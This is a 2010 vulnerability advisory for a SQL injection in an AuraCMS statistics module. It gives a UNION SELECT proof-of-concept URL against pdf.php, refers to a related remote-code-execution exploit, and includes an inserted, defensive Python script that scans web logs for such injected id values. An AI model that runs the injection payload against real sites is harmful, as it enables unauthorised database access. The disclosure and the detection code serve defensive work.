AuraCMS (pfd.php) SQL Injection Vulnerability
----------------------------------------------------------------------- |
Author : Arianom (arianom@indonesiancoder.com) |
Homepage : http://indonesiancoder.com |
Vendor : http://www.auracms.org/ |
Software : AuraCMS Mod Block Statistik | http://iwan.or.id/download/lihat/1/2-1-6.html |
Version : 1.62 |
Date : November 22, 2010 |
----------------------------------------------------------------------- |
I. POC & Exploit |
----------------------------------------------------------------------- |
http://localhost/pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7 |
II. Reference |
----------------------------------------------------------------------- |
AuraCMS 1.62 (stat.php) Remote Code Execution Exploit : http://www.exploit-db.com/exploits/4933/ |
III. Vendor patch |
----------------------------------------------------------------------- |
The vendor does not currently provide a patch or upgrade. |
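With no fix available, requests that reach the injectable parameter can still be found in web-server logs. The following is an added example, not part of the original advisory or of AuraCMS: it flags requests to pdf.php whose decoded id value is not a plain integer. The Common/Combined log format, the sample lines, the function names, and the assumption that a legitimate id is always an integer (as in the id=140 above) are illustrative.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of a Common/Combined Log Format entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Tokens that mark a decoded value as likely SQL rather than a mistyped id.
SQL_HINT_RE = re.compile(r"\b(?:union|select|and|or)\b|--|/\*|'", re.I)

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '203.0.113.5 - - [22/Nov/2010:10:00:01 +0700] "GET /pdf.php?id=140 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [22/Nov/2010:10:00:07 +0700] "GET /pdf.php?id=140+AND+1=2+UNION+SELECT+ind0nesianc0der,1,2,3,4,5,6,7 HTTP/1.1" 200 812',
    '203.0.113.9 - - [22/Nov/2010:10:00:09 +0700] "GET /pdf.php?id=140%20AND%201%3D2 HTTP/1.1" 200 640',
    '203.0.113.5 - - [22/Nov/2010:10:00:12 +0700] "GET /index.php?id=abc HTTP/1.1" 200 2048',
    '198.51.100.4 - - [22/Nov/2010:10:00:15 +0700] "GET /pdf.php?id=12abc HTTP/1.1" 200 300',
]

def classify_request(target, script="pdf.php", param="id"):
    """Return None for a clean request, else (decoded_value, reason)."""
    parts = urlsplit(target)
    if parts.path.rsplit("/", 1)[-1].lower() != script:
        return None  # a different script; out of scope for this check
    # parse_qs decodes %XX and '+', so encoded payloads are normalised
    # before they are inspected.
    values = parse_qs(parts.query, keep_blank_values=True).get(param, [])
    for value in values:
        # isascii() guards against Unicode digits that isdigit() accepts.
        if not (value.isascii() and value.isdigit()):
            reason = "sql-keywords" if SQL_HINT_RE.search(value) else "non-integer"
            return value, reason
    return None

def scan(lines):
    """Return (line_number, client_ip, reason, decoded_value) per suspicious line."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hit = classify_request(match.group(1))
        if hit:
            value, reason = hit
            findings.append((lineno, line.split(" ", 1)[0], reason, value))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The same integer-only rule, enforced in front of pdf.php rather than applied to logs after the fact, rejects the request in section I before it reaches the query.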
IV. Credits |
----------------------------------------------------------------------- |
Allahu Akbar |
INDONESIAN CODER ~ Kill-9 Crew ~ MC Crew |
Don Tukulesto ~ kaMtiEz ~ ibl13z ~ N4ck0 ~ Yurakha ~ aN93l1c ~ Mboys ~ Contrex ~ n4KuLa_ |
k4L0ng666 ~ Xr0b0t ~ kido ~ t3ll0 ~ cimpli ~ Pathloader |
V. Poem |
----------------------------------------------------------------------- |
We are ordinary people who love to learn. |
We like to study anything, including things that other people find strange or unfamiliar. |
We are here only to share, not to compete. |
Indonesian Coder Family